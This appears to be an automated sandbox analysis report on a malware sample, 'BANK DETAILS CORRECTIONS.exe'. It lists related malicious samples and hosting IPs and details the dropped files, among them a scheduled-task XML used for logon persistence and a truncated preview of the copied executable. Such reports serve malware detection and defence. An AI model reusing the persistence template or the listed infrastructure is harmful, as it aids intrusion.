                                                                                  xiaoyue.zhuangkou.comSecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • 47.76.88.64
                                                                                  55,000 receipt 18-03-2024 _PDF.vbsGet hashmaliciousFormBookBrowse
                                                                                  • 47.76.88.64
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exeGet hashmaliciousFormBookBrowse
                                                                                  • 47.76.88.64
                                                                                  CATALOG LISTs#U180ex#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                                  • 47.76.88.64
                                                                                  BL copy.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 47.76.88.64
                                                                                  Interviewed.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 47.76.88.64
                                                                                  Swift Copy.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 47.76.88.64
                                                                                  Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 47.76.88.64
                                                                                  SecuriteInfo.com.W32.MSIL_Kryptik.DSR.gen.Eldorado.1750.16396.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                  • 47.76.88.64
                                                                                  rChristineWolff20-45409-0-1243-ZE-7791-1-7.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                  • 47.76.88.64

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  BEGET-ASRUSecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  Swift Copy.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  SecuriteInfo.com.MSIL.Remcos.GWMJE.tr.2177.15379.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  New Purchase Order.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  SecuriteInfo.com.MSIL.Stealer.36680.tr.14329.14038.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 87.236.19.107
                                                                                  6BE4950D9A919F5D0150D19552B340E9B5EF1959A18FD.exeGet hashmaliciousLummaC, GCleaner, Mars Stealer, PrivateLoader, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                  • 45.130.41.108
                                                                                  rproformainvoice.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                  • 87.236.19.107
                                                                                  Lamps.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 45.130.41.51
                                                                                  ADVANTAGECOMUS5609012330.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 66.29.151.236
                                                                                  Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.159.53
                                                                                  BF-TL-605877001.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                  • 66.29.151.236
                                                                                  Scanned PO Copy.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 66.29.145.248
                                                                                  https://qrcodes.pro/pv2sHAGet hashmaliciousUnknownBrowse
                                                                                  • 66.29.146.203
                                                                                  24319847.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                                  • 66.29.156.99
                                                                                  Yolk.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 66.29.149.46
                                                                                  Reaeration.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 66.29.137.43
                                                                                  Americanistic57.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 66.29.149.46
                                                                                  BIS0Hgtq31.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 66.29.151.236
                                                                                  NAMECHEAP-NETUSgMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                  • 199.192.19.19
                                                                                  SecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • 198.54.126.45
                                                                                  55,000 receipt 18-03-2024 _PDF.vbsGet hashmaliciousFormBookBrowse
                                                                                  • 198.54.117.242
                                                                                  RECH14871487.lnkGet hashmaliciousNetSupport RAT, NetSupport Downloader, MalLnkBrowse
                                                                                  • 199.188.205.15
                                                                                  RECH31683168.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  • 199.188.205.15
                                                                                  RECH17321732_9e5ae629d707dac3d5517e7b2c0b05146fe4fdc0_f3e673ac82dd560f7e8de3126a1d027384a77c29.docxGet hashmaliciousNetSupport RATBrowse
                                                                                  • 199.188.205.15
                                                                                  logo trademark license agreement 97698.jsGet hashmaliciousUnknownBrowse
                                                                                  • 63.250.43.14
                                                                                  SecuriteInfo.com.Win32.PWSX-gen.32091.16097.exeGet hashmaliciousFormBookBrowse
                                                                                  • 198.54.126.45
                                                                                  IN___T9ZEKNFSIJ.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  • 199.188.205.15
                                                                                  IN___5MYRECKOVB.LNK.lnkGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                                  • 199.188.205.15
                                                                                  NBS11696USgMCSnfJRqp.exeGet hashmaliciousFormBookBrowse
                                                                                  • 64.190.62.22
                                                                                  https://onlinecgtapp.miros-app.com/browns-restaurants/property-value//imported/sso/t1//YnJpYW4uYXRraW5zb25AdmlyZ2lubW9uZXkuY29tGet hashmaliciousUnknownBrowse
                                                                                  • 64.190.63.136
                                                                                  USeZCMmN0v.elfGet hashmaliciousUnknownBrowse
                                                                                  • 65.48.96.224
                                                                                  http://cfpb.comGet hashmaliciousUnknownBrowse
                                                                                  • 64.190.63.136
                                                                                  PO 1402-16 AH.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 64.190.62.22
                                                                                  KY9D34Qh8d.exeGet hashmaliciousUnknownBrowse
                                                                                  • 64.190.63.222
                                                                                  Quotation MEW Tender 2024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 64.190.62.22
                                                                                  N270-10-MR-1671-01.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                  • 64.190.62.22
                                                                                  Medarbejderstabens189.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 64.190.62.22
                                                                                  Lokalplanlgningen.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 64.190.62.22
                                                                                  CLOUDIE-AS-APCloudieLimitedHKSecuriteInfo.com.Variant.Lazy.487114.22589.2790.exeGet hashmaliciousFormBookBrowse
                                                                                  • 103.197.25.241
                                                                                  hQmSR2hm9z.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                  • 103.215.93.26
                                                                                  8G0xiY8jY6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  5eP9g0W11O.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  GunWBbqqs2.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  p5LJe8NRpF.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  q0uI3t4ZYJ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  gquOKeeTBb.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  gkLPUOUtQ6.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73
                                                                                  AAMx4vRYYm.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 103.119.1.73

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BANK DETAILS CORRECTIONS.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fcLfLlfpmjf.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.379401388151058
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:fWSU4y4RQmTpoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHyIFTmLgZ2KRHWLOug8s
                                                                                  MD5:A6B4842283E7224B4E54457126CD8D9F
                                                                                  SHA1:E4F2678896DFEAD1A40BCD9F9CB356B41D9A5FEF
                                                                                  SHA-256:78CFFE0202C0F977B348AA571B4BB93791503F679FBA52CCB238F7079D129FBB
                                                                                  SHA-512:56DF9108664BD9FDDECE72BEABA54208A9195E7DFD6F21ED6F93F43D2F78FB59CC98D864FE62146FBFCB0EC2E89D506E823B2B4408D7B4DA16F0907442741ADB
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..<...............i..VdqF...|...........System.Configuration8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                  C:\Users\user\AppData\Local\Temp\DC886F4

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1211596417522893
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                  MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                  SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                  SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                  SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dshbixmz.por.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1qwrqkl.r5e.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3w1js1w.14s.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvpmwg5p.wdx.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4y0rj4m.1wo.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rn1ggqsz.lup.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvnvowfl.a2t.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwbispbp.uvf.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1570
                                                                                  Entropy (8bit):5.109876483667778
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTlv:He7XQBBYrFdOFzOz6dKrsuR
                                                                                  MD5:E6522ABE84BB6844D9E0A4380BBB47F4
                                                                                  SHA1:7F7CB8846888B57A6FC39A60D12A823F5379194F
                                                                                  SHA-256:180C9EA00FBBE694ACCF0C51450D2C1ADD571D194510FE9C871826B3F5D8EBBE
                                                                                  SHA-512:2D5F2184854BFCE11C4FDB8F90121086D0031BE190D137A45C42D0329B21F66323B23507A792E6AF5C8DA98A969786D73A47D888606EC14C0FC0ECD8D08652FF
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                                                                  C:\Users\user\AppData\Local\Temp\tmpC983.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1570
                                                                                  Entropy (8bit):5.109876483667778
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTlv:He7XQBBYrFdOFzOz6dKrsuR
                                                                                  MD5:E6522ABE84BB6844D9E0A4380BBB47F4
                                                                                  SHA1:7F7CB8846888B57A6FC39A60D12A823F5379194F
                                                                                  SHA-256:180C9EA00FBBE694ACCF0C51450D2C1ADD571D194510FE9C871826B3F5D8EBBE
                                                                                  SHA-512:2D5F2184854BFCE11C4FDB8F90121086D0031BE190D137A45C42D0329B21F66323B23507A792E6AF5C8DA98A969786D73A47D888606EC14C0FC0ECD8D08652FF
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                                                                  C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):691712
                                                                                  Entropy (8bit):7.985990383740242
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:EsJTENl3j9cLW29yuRN0wC3RHyGCRcB66IvtBlai0y8Ui31zO:txENlT2620eC4NRvvBlalqiFzO
                                                                                  MD5:6B3D6565F98F00436CF229258A5AC2C8
                                                                                  SHA1:6FD6B3E765C4E2D6C262E48F3DA8040F2F72E41C
                                                                                  SHA-256:D48E76A16A20D4AF37091F9DEA89CE3FA2341E273A3898AC1B8B398C2A5793D5
                                                                                  SHA-512:FEC6FC3B596FC7132A9652C7F7B3376A8CEC296661B147D6E12E038BA74EF999DABCD539002A1203608527D0CF43344FEA4FD90C3083C5522EA31E6A1E60FC73
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T...............0.............n.... ........@.. ....................................@.....................................O......................................p............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........5... ..........LV...>...........................................0...........(,....+..*..0..[.........o....r...p(....,2.o!...r...p(...., .o'... ....2..o....o..........+....,...(-....+....+..*..0.................,...(.....+....+..*...0..[.........o....r...p(....,2.o!...r...p(...., .o'... ....2..o....o..........+....,...(/....+....+..*".(.....*..r...p..*...%..^.(....}......}.....(.......(.....*..0...........(......{.....o.....*....0..n........s)......{....o....o ......{

                                                                                  C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe:Zone.Identifier

